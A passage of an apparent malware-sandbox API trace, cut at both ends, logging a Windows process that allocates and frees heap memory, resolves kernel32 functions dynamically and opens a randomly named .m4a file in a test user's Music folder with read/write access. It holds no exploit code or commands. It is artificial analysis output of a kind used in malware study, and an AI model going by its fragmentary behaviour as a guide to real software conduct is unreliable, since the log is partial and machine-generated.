Size=0x10001) returned 0xbca008 [0185.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0185.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x69) returned 0x906f38 [0185.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", cchWideChar=105, lpMultiByteStr=0x906f38, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", lpUsedDefaultChar=0x0) returned 105 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.635] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\iytlsfhuhj3z6gymj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0185.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=105, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd2) returned 0x8feba8 [0185.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=105, lpWideCharStr=0x8feba8, cchWideChar=105 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a") returned 105 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8fff00 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.637] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.639] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0185.639] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.640] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.641] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0185.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd978, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.641] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0185.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0185.641] CloseHandle (hObject=0x138) returned 1 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.642] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: 